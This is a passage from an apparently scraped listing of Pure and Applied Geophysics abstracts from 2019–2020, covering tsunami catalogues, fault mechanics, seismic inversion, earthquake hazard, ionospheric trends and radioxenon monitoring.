landslide-generated (19%), volcanic (8%), and meteorological (7.5%) sources. The analysis of geographical distribution of source locations demonstrates that tsunamis are not exclusively a marine hazard—over 15% of all maximum runups were observed in coastal and inland water basins (narrow bays, fiords, lakes, and rivers). Temporal distribution of the collected runups shows that annual occurrence of large tsunamis was more or less stable throughout the twentieth century and only demonstrates some increase during the last 27 years (since 1992) when the practice of post-event surveys of all damaging tsunamis was implemented. This paper also outlines the existing problems with data compilation, cataloguing, and distribution, and discusses incompleteness of runup and wave-form data for a considerable number of non-damaging tsunamis, even those resulting from the strong (magnitude higher than 7.5) submarine earthquakes. 更新日期:2020-02-10 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-02-06 Xiaofeng Chen, Brett M. Carpenter, Ze’ev Reches Abstract Stick–slips are spontaneous, unstable slip events during which a natural or man-made system transitions from a strong, sticking stage to a weaker, slipping stage. Stick–slips were proposed by Brace and Byerlee (Science 153:990–992, 1966) as the experimental analogue of natural earthquakes. We analyze here the mechanics of stick–slips along brittle faults by conducting laboratory experiments and by modeling the instability mechanics. We performed tens of shear tests along experimental faults made of granite and gabbro that were subjected to normal stresses up to 14.3 MPa and loading velocities of 0.26–617 µm/s. We observed hundreds of spontaneous stick–slips that displayed shear stress drops up to 0.66 MPa and slip-velocities up to 14.1 mm/s. The pre-shear and post-shear fault surface topography were mapped with atomic force microscopy at pixel sizes as low as 0.003 µm2. We attribute the sticking phase to the locking of touching asperities and the slipping phase to the brittle failure of these asperities, and found that the fault asperities are as strong as the inherent strength of the host rock. Based on the experimental observations and analysis, we derived a mechanical model that predicts the relationships between the measured stick–slip properties (stress-drop, duration, and slip-distance) and asperity strength. 更新日期:2020-02-07 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-02-06 Mattia Aleardi, Alessandro Salusti Abstract We infer the elastic and petrophysical properties from pre-stack seismic data through a transdimensional Bayesian inversion. In this approach the number of model parameters (i.e. the number of layers) is treated as an unknown, and a reversible jump Markov Chain Monte Carlo (rjMCMC) algorithm is used to sample the variable-dimension model space. This inversion scheme provides a parsimonious solution, and reliably quantifies the uncertainties affecting the estimated model parameters. Parallel tempering, which employs a sequence of interacting Markov chains in which the likelihood function is successively relaxed, is used to improve the efficiency of the probabilistic sampling. In addition, the delayed rejection updating scheme is employed to speed up the convergence of the rjMCMC algorithm to the stationary regime. Both elastic and petrophysical inversions invert the amplitude versus angle responses and employ a convolutional forward modelling based on the exact Zoeppritz equations. First, synthetic tests are used to assess the reliability of the implemented rjMCMC algorithms, then their applicability is demonstrated by inverting field seismic data acquired onshore. In this case the inversion was aimed at inferring the elastic and petrophysical properties around a gas-saturated reservoir hosted in a shale-sand sequence. In this case, the final outcomes provided by the rjMCMC algorithms are also compared with the predictions of linear Bayesian elastic and petrophysical inversions. The synthetic and field data examples demonstrate that the implemented algorithms can successfully estimate model uncertainty, model dimensionality and subsurface parameters with an affordable computational cost. 更新日期:2020-02-07 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-02-06 Weiping Wang, Jiansi Yang, Yanbin Wang Abstract In the southeastern part of Tibet, an earthquake with a local magnitude of 6.9 occurred in the prefecture of Mainling on 18 November 2017. The mainshock and more than 900 aftershocks were recorded by a local seismic network comprising seven three-component seismic stations. In this study, both HypoDD location of aftershocks and focal mechanism inversion of moderate events were performed in order to accurately identify the pattern of active faults. The result reveals that the mainshock has a thrust source mechanism located at a depth of 14 km beneath the NE flank of the Namcha Barwa–Gyala Peri (NB-GP) massif. The aftershock sequences are caused mainly by two determined faults, one of which is the seismogenic fault stretching with a SE–NW trend parallel to the GP ridge and with a high NE-oriented dipping angle, and the other is activated by the mainshock and displays features of a SSE-NNW trend and SW-dipping, inferring the adjustment of stress in the focal area. The source parameters of the mainshock and the selected aftershocks show the reverse property of the seismogenic fault and its adjunct fault, thus inferring the backlash and uplift of the NB-GP massif, especially GP, for adjusting the uneven extrusion from the eastern Himalayan syntaxis to the adjacent Lhasa block. Furthermore, it is deduced that the rupture energy of the mainshock and aftershocks was limited by the surrounding rigid rock mass with high seismic velocity, such as the Lhasa block in the north and east, and Namcha Barwa complex in the south, and other aftershocks appearing at the NW top of GP and the SE side of Yarlung Tsangpo Big Bend reflect the strong squeezing effect of the NB-GP massif to its northeastern geological mass. 更新日期:2020-02-07 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2019-11-06 Matheus Felipe Stanfoca Casagrande, César Augusto Moreira, Débora Andrade Targa Abstract Mineral exploration is often associated with the generation of environmental liabilities, whose potential damages might imperil local water quality. An example of these environmental impacts is the acid mine drainage—AMD, caused by sulfides oxidation and production of acid and saline effluents. The analysis of critical areas with generation and spread of contamination plumes becomes more feasible due to the possibility to obtain geophysical models of water systems, especially to identify regions with accumulation of reactive minerals and preferential water flows. The rock-waste pile named BF-04 fits in this context of contamination, and it was studied based on the Electrical Resistivity Tomography technique, inversion models and isosurface models, providing conditions to recognize sulfide zones (> 10.1 mV/V), whereas chaotic high salt content underground flows, along several depths, were identified by low resistivity zones (< 75.8 Ω m). The complex behavior of groundwater flow in this kind of artificial granular aquifer is caused by its granulometric and lithologic heterogeneities, and compacted material. In addition, the results reveled a substantial water infiltration from Consulta creek, however the most critic zones for AMD generation are located at shallow levels where the waste rock material is more exposed to atmospheric O2 and meteoric water infiltration. The bedrock was not associated with significant low resistivity anomalies, which means that its contribution to AMD generation was considered relatively less important. The results will contribute to the environmental remediation management and also to demonstrate the potential applicability of geophysical methods in mining wastes. 更新日期:2020-02-07 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2019-08-22 Minyou Kim, Keunhee Lee, Yong Hee Lee Abstract There have been many studies to improve visibility forecast skills using numerical models, but their performance still remains behind the forecast skills for other meteorological phenomena. This study attempted to improve visibility forecasts using a newly established automatic visibility observation network composed of 291 forward-scattering sensors in South Korea. In the analysis of recent 3-year visibility observations, clear days (visibility above 20 km) were reported for 46% of the days, and fog cases (visibility less than 1 km) accounted for 1.58% of the total observations. The Very short-range Data Assimilation and Prediction System (VDAPS) of the Korea Meteorological Administration (KMA) assimilated the visibility observations based on the Met Office Unified Model with visibility data assimilation of Clark et al. (Q J R Meteorol Soc 134:1801–1816, 2008). Prior to the data assimilation, a precipitation check eliminated visibility data with precipitation (9.4% in total, 23% for visibility less than 1 km), and a consistency check removed visibility observations that were inappropriate to relative humidity, temperature, and pressure. In a case study on two consecutive fog days, visibility forecast skills were improved by applying visibility data assimilation, mostly through modifications of aerosol concentrations. A 3-month model run in the winter of 2016 showed a positive bias in visibility predictions, especially for the low-visibility cases. Visibility data assimilation improved the prediction skills, but the positive effects were limited within 9 forecast hours and were smaller for extremely low-visibility events. Sensitivity experiments were performed using local aerosol observations with a larger number of smaller aerosol particles. Modifications in aerosol properties made better results in frequency bias for the whole forecast ranges and also improved the equitable threat score (ETS) for relatively longer forecast hours (more than 4 h). 更新日期:2020-02-07 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2019-10-17 Atsushi Sainoki, Chiaki Hirohama, Adam Karl Schwartzkopff Abstract In the numerical simulation of induced seismicity, much attention is generally paid to the calibration of the frictional resistance of the causative fault to obtain a seismic moment consistent with that of the actual event, whereas sufficient investigation is not made in the estimation of the slip-weakening distance Dc as well as in the calibration of seismically radiated energy. The present study addresses this problem by numerically and analytically investigating the relation between Dc and seismic source parameters. First, this study performs the dynamic simulation of an induced seismic event caused by a decrease in the effective normal stress. The analysis demonstrated that seismic efficiency η can be used to improve the accuracy of estimating the critical slip-weakening distance and the coefficient of kinetic friction µd whilst considering not only seismic moment but also radiated energy in the calibration. This gave insight into the development of the new calibration method for induced seismicity that considers energy-related seismic source parameters. Furthermore, a new scaling law of the slip-weakening distance was derived from the theoretical expression of seismic efficiency η, considering seismic moment Mo and scaled energy $$\hat{e}$$. The proposed scaling law can yield the relation between Dc and Mo, which is shown to be similar to that obtained from a previous study, but additionally considers the relation between seismically radiated energy and Dc. The dependency of Dc on seismically radiated energy implied from the proposed scaling law has been verified from the dynamic analyses where η = 0.06 was used to place a constraint on Dc for seismic events with different magnitudes. The developed numerical simulation methodology of induced seismicity as well as the scaling law considering the energy indices significantly contributes to improving the accuracy of back-analysis, thus leading to a more accurate estimation of the mechanical properties of faults and/or shear zones in seismically active regions of deep underground mines or reservoirs composed of discontinuous hard rock masses. 更新日期:2020-02-07 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2019-10-09 Carles Mulet-Forteza, Antonio Socias Salvá, Sebastian Monserrat, Angel Amores Abstract Pure and Applied Geophysics (PAGEOPH) is one of the leading journals in the field of geophysics. The first issue was published in 1939; thus, the journal is celebrating its 80th anniversary in 2018. The aim of this paper is to provide a complete lifetime overview of the academic structure of the journal using bibliometric indicators. This analysis includes key factors such as the most cited articles, leading authors, originating institutions and countries, publication and citation structures, and the most commonly used keywords. The bibliometric data used to conduct this analysis comes from the Scopus database. Additionally, the visualization of similarities (VOS)viewer software is used to create a graphic map of some of the bibliometric results. The graphical analysis uses co-citation, bibliographic coupling and co-occurrence of keywords. The results indicate that PAGEOPH is a leading journal in the areas in which it is indexed, with publications from a wide range of authors, institutions, and countries around the world. 更新日期:2020-02-07 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2019-10-29 Zhen Fu, Lisheng Xu, Yongzhe Wang Abstract On the basis of the continuous and dense GPS observations covering the northern segment of the Xiaojiang fault zone (n-XJFZ) from March 2012 to March 2016, we present the velocity field, spatiotemporal deformation, slip rate and locking depth of the n-XJFZ. The results provide strong support for achieving a better understanding of the deformation behavior of this fault. The heterogeneity of the GPS velocity field and relatively nonuniform distribution of seismicity suggest that the observational area is fragmented. Shear strain has been accumulating with an almost constant azimuth, which is consistent with the trends of the mapped major faults. The 2014 Ms 6.5 Ludian earthquake produced a sudden change in the dilatational strain, which was almost constant prior to the event, and an increase in the shear strain rate. The near-field deformation of the n-XJFZ estimated with the near-field data was larger than expected, revealing that the n-XJFZ is becoming more locked. These results imply that the seismic risk in the study area is currently rising and that, similar to the 2014 Ms 6.5 Ludian earthquake, future earthquakes will possibly occur away from mapped faults. 更新日期:2020-02-07 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2019-08-22 Rubeni T. Ranganai, Oswald Gwavava, Cynthia J. Ebinger, Kathryn A. Whaler Abstract The subsurface geometry of five representative late Archaean ‘Chilimanzi and Razi’ suite plutons in the Zimbabwe craton (ZC) has been investigated by gravity modelling constrained in part by surface geology, density measurements and seismic information, to determine their 3D configuration and infer tectonic context of emplacement. The generally K-rich, massive, homogeneous monzogranites are characterised by large Bouguer gravity lows (up to − 30 mGal amplitude) whose gradients outline their spatial extent well. The southernmost plutons and their anomalies have general trends paralleling the North Marginal Zone (NMZ) of the Limpopo orogenic belt (LB). Predictive gravity models indicate that the density contrast of the Chivi batholith (CB) adjacent to the ‘volcanic arc-like’ Belingwe greenstone belt extends to a depth of about 13 km. The nearby Razi pluton (RP) which intrudes the ZC-LB boundary appears to have been emplaced at shallower depths/levels. The gravity model suggests a thickness of about 5–6 km, and a moderate to shallow dip to the southeast under the NMZ, compatible with syn-kinematic intrusion during overthrust of the LB over the ZC. The smallest Nalatale granite (Ng) is on average 2.5 km thick under the Fort Rixon greenstone belt but includes a root up to 4.5 km thick under the anomaly peak, and a steep contact with the tonalite/gneiss to the east. These granites follow the general power-law for pluton dimension and are similar in this respect to the classical wedge-shaped plutons, extending largely in one direction, with large aspect ratios (Length (L)/Thickness (T) > 7). However, the overall shape of the RP is typical of a diapir (Width (W) < T), although it may have been affected by the LB deformation. Gravity modelling along a NS traverse crossing the Chilimanzi batholith (ChB), the Masvingo greenstone belt (MGB) and the Zimbabwe granite (ZG) indicate a thickness of around 6 km for the dense greenstone belt with a thickness of about 8.5 km for the adjacent ZG. The ‘complex’ shaped ChB shows a 2 km thick tabular body with a root zone extending to ~ 4.5 km depth on the south end, adjacent to the greenstone belt; typical of the so-called flat-floored plutons with a gently dipping floor towards the root zone. These two plutons roughly follow the power-law for laccolith/batholith dimensions (W/T > 5; L/T > 15). Overall, the CB and the ZG are interpreted as massive, deep-rooted batholithic intrusions (L/T ≅ 10), contrary to some geological interpretations of these late, post-kinematic intrusions as sheet-like bodies emplaced at relatively shallow levels in the crust. On the other hand, the ChB appears to be a tabular intrusion, probably fed by dykes; it exhibits a lateral extent much greater than the vertical one, outlining a sheeted geometry (W/T > 7; L/T > 18). The geophysical evidence, together with geological and fabric data, support and/or confirm the two main granite configurations: sheets and batholith; and thus also confirm the two main modes of emplacement: dyke and diapirism or ballooning plutonism. This is consistent with other known batholiths on the ZC but considered unusual for plutons of the same age and spatially close when compared to other Archaean cratons. 更新日期:2020-02-07 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2019-09-09 Łukasz Wojtecki, Petr Konicek, Maciej J. Mendecki, Iwona Gołda, Wacław M. Zuberek Abstract Deep longwall mining of coal seams is made in the Upper Silesian Coal Basin (USCB) under complicated and mostly unfavourable geological and mining conditions. Usually, it is correlated with rockburst hazard mostly at a high level. One of the geological factors affecting the state of rockburst hazard is the presence of competent rocks in the roof of extracted coal seams, so rock falling behind the longwall face does not occur, and hanging-up of roof rocks remains. The long-lasting absence of caving may lead to an occurrence of high-energy tremor in the vicinity of the longwall face. Roof caving behind the longwall face may be forced by blasting. The column of explosives is then located in blastholes drilled in layers of roof rocks, e.g. sandstones behind the longwall face. In this article, a characterization of tremors initiated by blasts for roof caving during underground extraction of coal seam no. 507 in one of the collieries in the USCB has been made using three independent methods. By the basic seismic effect method, the effectiveness of blasting is evaluated according to the seismic energy of incited tremors and mass of explosives used. According to this method, selected blasts gave extremely good or excellent effect. An inversion of the seismic moment tensor enables determining the processes happening in the source of tremors. In the foci of provoked tremors the slip mechanism dominated or was clearly distinguished. The expected explosion had lesser significance or was not present. By the seismic source parameters analysis, among other things, an estimation of the stress drop in the focus or its size may be determined. The stress drop in the foci of provoked tremors was in the order of 105 Pa and the source radius, according to the Brune’s model, varied from 44.3 to 64.5 m. The results of the three mentioned methods were compared with each other and observations in situ. In all cases the roof falling was forced. 更新日期:2020-02-07 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2019-10-09 Abstract A retrospective analysis of 17 years of NCMRWF Global Forecast System (NGFS) data was conducted to understand the state and variability of cold wave episodes over northwest India. During the 2000–2016 period, a total of 21 cold wave episodes (202 cold nights) were detected, out of which 5 severe cold episodes (63 cold nights) were registered. The 10 (6) episodes occurred during La Niña (El Niño) years suggesting that both phases of El Niño-Southern Oscillation provide a favourable background for the occurrence of cold waves. The average duration of a cold wave episode was ~ 9.6 days, with the longest (shortest) episode, seen in the year 2008 (2006), lasting for 26 (6) consecutive days. The average duration of a severe cold wave episode is ≈ 4 days longer than that of a normal cold wave. In the year 2005, both the earliest (11 December) and latest (16 February) onsets of cold waves were seen. The omnipresence of intense Siberian anticyclone and the presence of western disturbance brought cold winds to the study region. Also, temperature advection and geo-potential height anomalies play vital roles in the maintenance of cold waves. The cold waves exhibit a significant intra-annual variability over northwest India. The intensity of cold waves has shown an increase of 0.11 °C per cold episode. 更新日期:2020-02-07 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2019-11-11 Samiran Das, Dehua Zhu, Chi-Han Cheng Abstract Changes in overall observed precipitation have been recognized in many parts of the world in recent decades, leading to the argument on climate change and its impact on extreme precipitation. However, the concept of natural variations and the complex physical mechanisms hidden in the observed data sets must also be taken into consideration. This study aims to examine the matter further with reference to inter-decadal variability in extreme precipitation quantiles appropriate for risk analysis. Temporal changes in extreme precipitation are assessed using a parametric approach incorporating a regional method in region-of-influence form. The index-flood method with the application of generalized extreme value distribution is used to estimate the decadal extreme precipitation. The study also performs a significance test to determine whether the decadal extremes are significant. A case study is performed on the Yangtze River Basin, where annual maximum 1-day precipitation data for 180 stations were analyzed over a 50-year period from 1961 to 2010. Extreme quantiles estimated from the 1990s data emerged as the significant values on several occasions. The immediate drop in the quantile values in the following decade, however, suggested that it is not practical to assign more weight to recent data for the quantile estimation process. The temporal patterns identified are in line with the previous studies conducted in the region and thus make it an alternative way to perform decadal analysis with an advantage that the scheme can be transferred to ungauged conditions. 更新日期:2020-02-07 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2019-08-29 Blas F. de Haro Barbás, Ana G. Elias Abstract One of the main ionization sources of the F2 region of the Earth’s ionosphere is the solar EUV irradiance accounting for ~ 90% of its variability during quiet time. Consequently, prior to long-term trend estimations solar activity must be filtered out. The last two solar activity cycles present low activity levels, and particularly solar cycle 24 is the lowest in the last ten solar cycles. The effect of the inclusion of this last solar cycle on foF2 trend estimation is analyzed for two mid-latitude ionospheric stations: Kokubunji (35.7°N, 139.5°E) and Wakkanai (45.4°N, 141.7°E). Filtering is done considering the residuals of different regressions between foF2 and Rz and also between foF2 and F10.7. In both cases, foF2 trends become less negative when solar cycle 24 is included in trend estimations since foF2 residuals systematically exceeds the values predicted by a linear, quadratic or cubic fit between foF2 and F10.7 or Rz from 2008 onwards. In addition, the Earth’s magnetic field secular variation at both stations would induce a positive foF2 trend during daytime that could counteract the greenhouse gases decreasing trend. It is interesting to think that including the latest solar cycles does not necessarily imply incorrect results in the statistical analysis of the data, but simply that solar activity is decreasing on average and also the trend. 更新日期:2020-02-07 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-02-05 Sergii Kivva, Mark Zheleznyak, Oleksandr Pylypenko, Vasyl Yoschenko Abstract Our goal was to develop a robust algorithm for numerical simulation of one-dimensional shallow water flow in a complex multiply-connected channel network with arbitrary geometry and variable topography. We apply a central-upwind scheme with a novel reconstruction of the open water surface in partially flooded cells that does not require additional correction. The proposed reconstruction and an exact integration of source terms for the momentum conservation equation provide positivity preserving and well-balanced features of the scheme for various wet/dry states. We use two models based on the continuity equation and mass and momentum conservation equations integrated for a control volume around the channel junction to its treatment. These junction models permit to simulate subcritical and supercritical flows in a channel network. Numerous numerical experiments demonstrate the robustness of the proposed numerical algorithm and a good agreement of numerical results with exact solutions, experimental data, and results of the previous numerical studies. The proposed new specialized test on inundation and drying of an initially dry channel network shows the merits of the new numerical algorithm to simulate the subcritical/supercritical open water flows in the networks. 更新日期:2020-02-06 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-02-05 Peter Vajda, Pavol Zahorec, Juraj Papčo, Daniele Carbone, Filippo Greco, Massimo Cantarero Abstract Some geophysical or geodynamic applications require the use of true vertical gradient of gravity (VGG). This demand may be associated with reductions of or corrections to observed gravity or its spatiotemporal changes. In the absence of in situ measured VGG values, the constant value of the theoretical (normal) free air gradient (FAG) is commonly used. We propose an alternative to this practice which may significantly reduce systematic errors associated with the use of constant FAG. The true VGG appears to be better approximated, in areas with prominent and rugged topography, such as alpine or some volcanic regions, by a value based on the modelled contribution of the topographic masses to the gradient. Such prediction can be carried out with a digital elevation model (DEM) of sufficient resolution and accuracy. Here we present the VGG field computed for Mt. Etna (Italy), one of the most active and best monitored volcanoes worldwide, to illustrate how strongly the VGG deviates spatially from constant FAG. The predicted (modelled) VGG field is verified by in situ observations. We also take a look at the sensitivity of the VGG prediction to the resolution and quality of used DEMs. We conclude with discussing the applicability of the topo-predicted VGG field in near surface structural and volcanological micro-gravimetric studies. 更新日期:2020-02-06 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-02-05 M. Jakir Hossen, Anne F. Sheehan, Kenji Satake Abstract In this study, we developed a new search algorithm to find a multi-fault model of a complex earthquake using tsunami data, and applied it to the January 23, 2018 M7.9 Kodiak earthquake. Our method includes a Green’s function based time reverse imaging (GFTRI) approach to invert for sea surface displacement using tsunami waveforms, followed by inversion of the sea surface displacement for the earthquake slip distribution. The global CMT focal mechanism for this event indicates that faulting occurred on a steeply dipping fault striking either N–S (right lateral) or E–W (left lateral), while subsequent work reveals a more complex pattern of strike-slip faulting. We carried out a number of source inversions using different combinations of faults to find the model based on an extremum for residual errors. Our results suggest that the rupture occurred on at least three faults oriented in approximately N–S and E–W directions. We further explored the fault-geometry parameters by perturbing them within a range suggested by previous work. We found that the sea surface displacement model is best fit by our preferred three fault-model with the set of parameters (strike, dip, rake): ($$165^{\circ }$$, $$60^{\circ }$$, $$154^{\circ }$$) and ($$265^{\circ }$$, $$60^{\circ }$$, $$10^{\circ }$$) for N–S and E–W directions, respectively. 更新日期:2020-02-06 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-02-05 Giancarlo Dal Moro Abstract In seismic hazard studies, the Horizontal-to-Vertical Spectral Ratio (HVSR) is nowadays routinely considered as a quick way to assess possible amplification effects. However, because of several issues that can affect the data, the HVSR cannot be considered as valid per se, and a careful data evaluation is necessary. In this study, a series of HVSR curves are evaluated in order to highlight industrial components that can significantly alter the natural HVSR. First, a controlled-source experiment is carried out in order to define the characteristics of spurious industrial signals. Data analysis shows that the coherence functions and the mildly smoothed amplitude spectra plotted with linear scales can help significantly in identifying industrial components that can be otherwise difficult to highlight. Coherence functions appear particularly interesting because of their ability to reveal the presence of industrial components independently of their amplitude. Field data from three sites are then analyzed on the basis of the evidence obtained through the controlled-source experiment. For the third site, data recorded on two different days are considered. While in the first data set no significant industrial component is present, in the second and third data sets, a series of remarkable industrial signals that severely alter the natural HVSR are identified. The assessment of the coherence functions and mildly smoothed amplitude spectra is therefore suggested as a valuable support to avoid pitfalls in the interpretation of the experimental HVSR. Finally, two quick and dirty procedures aimed at reducing the effect of industrial components are also presented. 更新日期:2020-02-06 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-02-03 Kejia Wang, Richard E. Thomson, Alexander B. Rabinovich, Isaac V. Fine, Tania L. Insua Abstract The major (Mw 7.9) earthquake that struck the Gulf of Alaska near Kodiak Island on 23 January 2018 was a rare, mid-plate strike-slip event that triggered a minor trans-Pacific tsunami. An analysis of the simultaneous measurements of tsunami waveforms at 21 open-ocean sites (including three independent arrays of stations) and 27 coastal tide gauges in the Gulf of Alaska and along the coast of North America has enabled us to examine properties of the 2018 tsunami, its transformation over the continental slope and shelf, and its amplification as the waves approached the coast. Results show that the tsunami wave variance decreased monotonically along the west coast from northern British Columbia to southern Oregon. Based on the variance structure, the mean amplification factor for Tofino on the west coast of Vancouver Island (a “beacon” site with a long time series), was $$A_{RMS}^{Tof}$$ = 5.3, in good agreement with corresponding estimates for four major past events; 4.5 (2009 Samoa), 4.3 (2010 Chile), 6.3 (2011 Tohoku) and 5.2 (2012 Haida Gwaii). This variance-derived amplification for Tofino was greater than the amplification factor based on the amplitude ratio ($$A_{{}}^{Tof}$$ = 3.2). Spectral analysis of the records showed that the tsunami had a relatively large high-frequency content (i.e., was “blueish”), with nearly 90% of the total energy in the open ocean at frequencies > 1.7 cph (periods < 35 min) and with an “integral frequency scale” of 4 cph (period 15 min). Wavelet analysis revealed strong dispersion of the propagating tsunami waves, in agreement with theoretical estimates. The abrupt jump in water depth of about 4 cm detected at DART 46409, located mid-plate about 85 km from the epicenter of the 2018 Kodiak earthquake, appears to have been due to an earthquake-induced seafloor subsidence. 更新日期:2020-02-03 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-02-03 V. F. Pisarenko, M. V. Rodkin Abstract The possibilities of statistical estimation of quantiles of predicted maximum peak ground acceleration are discussed. The estimation is based on the theory of extreme values. The quantiles of maximum peak ground acceleration are calculated for a spatial grid covering the territory of high seismicity regions of Japan, Kuril Islands, and Kamchatka. A new phenomenon is observed: spatial spots of increased ground acceleration showing essential inhomogeneity not only across the deep ocean trench, but as well along its extension. Some spots exist during all observation time (130 years), whereas some other can disappear or appear during this time interval. The position of majority of spots is correlated with the concentration of underwater sea mounts at the adjacent part of the oceanic plate. The subduction of these sea mounts could induce an increased seismicity. A correlation of spots with sites of increased (Mb − Mw) values is observed also, which can be caused by an increased friction between the plates. Stable spots of higher acceleration are observed for different earthquake catalogs and various time periods. Our results make advisable using the extreme values theory technique for statistical estimation of seismic hazard, in particular, for characterization of seismic activity spots. 更新日期:2020-02-03 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-31 Alessandro Longo, Stefano Bianchi, Wolfango Plastino, Irene Fiori, Donatella Fiorucci, Jan Harms, Federico Paoletti, Matteo Barsuglia, Mikel Falxa Abstract A methodology using adaptive time series analysis is tested on data from a seismometer monitoring the north end building (NEB) of the Virgo interferometer during four acoustic noise injections. Empirical mode decomposition (EMD) is used for adaptive detrending, while the recently developed time-varying filter EMD algorithm is used for narrowband mode extraction. Mode persistency is evaluated with detrended fluctuation analysis, and denoising is achieved by setting a threshold $$H_{\text {thr}}$$ on the Hurst exponent of the obtained modes. The adopted methodology is proven useful in adaptively separating the seismic noise induced by the acoustic noise injections from the underlying nonlinear non-stationary recordings of the seismometer monitoring NEB. The Hilbert–Huang transform provides a high-resolution time–frequency representation of the data. Furthermore, the local Hurst exponent exhibits a drop due to the injections that is of the same order of $$H_{\text {thr}}$$. This suggests that the local Hurst exponent could be calculated as an initial step in order to select the threshold $$H_{\text {thr}}$$. The algorithms could be used for detector characterisation purposes such as the investigation of non-Gaussian noise. 更新日期:2020-01-31 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-31 C. Nunziata, M. R. Costanzo Abstract Ground motion is computed at the historical center of Napoli for the 5 December 1456 and 5 June 1688 earthquakes responsible for VIII maximum felt intensity (MCS scale). Computations are performed using the hybrid technique, which is based on the mode summation and finite difference methods. These consider the source, propagation and local site effects. The approach is fully justified by the detailed knowledge of the physical parameters of the local subsoil based on the models inferred from noise cross-correlation measurements between two receivers. Moreover, the propagation model is validated through the fitting of synthetics with recording of a moderate earthquake at the historical center of Napoli (29 December 2013, MW = 5.2) close to the seismogenic fault responsible for the 1688 earthquake. Ground motion is computed along a two-dimensional section crossing the historical center for the seismogenic sources as known from the literature. A consistency exists between the computed peak ground acceleration and intensity data if we attribute higher moment magnitudes of 7 to the 1688 earthquake and 7.3–7.4 for the 1456 earthquake. In light of the uncertainties related to the macroseismic intensities and estimated magnitudes of these historical events and the relevant masonry heritage of the historical center of Napoli, the highest values of the computed ground motion are suggested for seismic retrofitting of the masonry heritage. A scenario earthquake like those of 1688 (MW = 7) and 5 December 1456 (MW = 7.4) is predicted by the seismic code for limit states of life safety or collapse, depending on the site and the true material damping. 更新日期:2020-01-31 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-30 Nikolaos S. Melis, Emile A. Okal, Costas E. Synolakis, Ioannis S. Kalogeras, Utku Kânoğlu Abstract We present a modern seismological reassessment of the Chios earthquake of 23 July 1949, one of the largest in the Central Aegean Sea. We relocate the event to the basin separating Chios and Lesvos, and confirm a normal faulting mechanism generally comparable to that of the recent Lesvos earthquake located at the Northern end of that basin. The seismic moment obtained from mantle surface waves, $$M_0 = 7 \times 10^{26}$$ dyn cm, makes it second only to the 1956 Amorgos earthquake. We compile all available macroseismic data, and infer a preference for a rupture along the NNW-dipping plane. A field survey carried out in 2015 collected memories of the 1949 earthquake and of its small tsunami from surviving witnesses, both on Chios Island and nearby Oinousses, and on the Turkish mainland. While our results cannot help discriminate between the two possible fault planes of the 1949 earthquake, an important result is that both models provide an acceptable fit to the reported amplitudes, without the need to invoke ancillary sources such as underwater landslides, in contrast to the case of other historical tsunamis in the Aegean Sea, such as the 1956 Amorgos and 1948 Rhodos events. 更新日期:2020-01-31 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-27 Vansittee Dilli Rao, Deepankar Choudhury Abstract This study attempts to estimate the probability of the occurrence of large earthquakes (Mw ≥ 5.5) in the northwestern part of Haryana state, India, where a new nuclear power plant (NPP) is going to be constructed in the near future. First, an earthquake catalogue is developed for the period 1803–1986, and five stochastic models, namely lognormal, Weibull, gamma, Rayleigh, and double exponential, are then applied to past earthquake data. The performance of these models is checked using three statistical tests, and the lognormal, Weibull, and Rayleigh models are found to produce good approximations for this region, whereas the double exponential and gamma models yield intermediate and poor results. Hence, cumulative and conditional probabilities and related hazard curves for future earthquakes are estimated using the most suitable models. The cumulative probability of the occurrence of an earthquake (Mw ≥ 5.5) since the last event (1986) reached 0.95–0.98 as of 2018. The conditional probability of the occurrence of such an earthquake reaches 0.90–0.95 about 9–12 years from now (2027–2030), when the elapsed time will be 32 years (i.e., since 2018). The probability of earthquakes with different threshold magnitudes is then estimated, and based on the outcome of this investigation, earthquake magnitudes are classified from occasional (Mw ≤ 6.1) to very rare events (Mw ≥ 7.6) that this region may experience in the future. The findings of this study will be considered in seismic hazard assessment, liquefaction hazard assessment, and earthquake-resistant design of NPP components. 更新日期:2020-01-27 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-27 A. Ringbom, A. Axelsson, O. Björnham, N. Brännström, T. Fritioff, H. Grahn, S. Hennigor, M. Olsson Abstract An analysis of a data set consisting of 3 years of high time resolution radioxenon stack measurements from the three nuclear reactors at the Forsmark nuclear power plant in Sweden, as well as measurements of atmospheric radioxenon in Stockholm air, 110 km away, is presented. The main causes for the stack releases, such as the function of the xenon mitigation systems, presence of leaking fuel elements, and reactor operations such as shutdown and startup, are discussed in relation to the stack data. The relation between radioxenon releases and reactor operation is clearly illustrated by the correlation between the stack measurements and thermal reactor power. In general, the isotopic ratios of the Stockholm measurements, which are shown to mainly originate from Forsmark releases, agree well with stack measurements, and with a modeled reactor operational sequence. Results from a forward atmospheric dispersion calculation agree very well with observed plume arrival times and widths, and with some exceptions, also with absolute activity concentrations. The results illustrates the importance of detailed knowledge of radioxenon emissions from nuclear power plants when interpreting radioxenon measurements for nuclear test ban verification, and provide new input to this kind of analysis. Furthermore, it demonstrates the possibility to use sensitive radioxenon detection systems to remotely detect and verify reactor operation. 更新日期:2020-01-27 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-27 Ruey-Der Hwang, Cheng-Ying Ho, Tzu-Wei Lin, Wen-Yen Chang, Yi-Ling Huang, Cai-Yi Lin, Chiung-Yao Lin Abstract A systematic analysis of the source duration (τ) 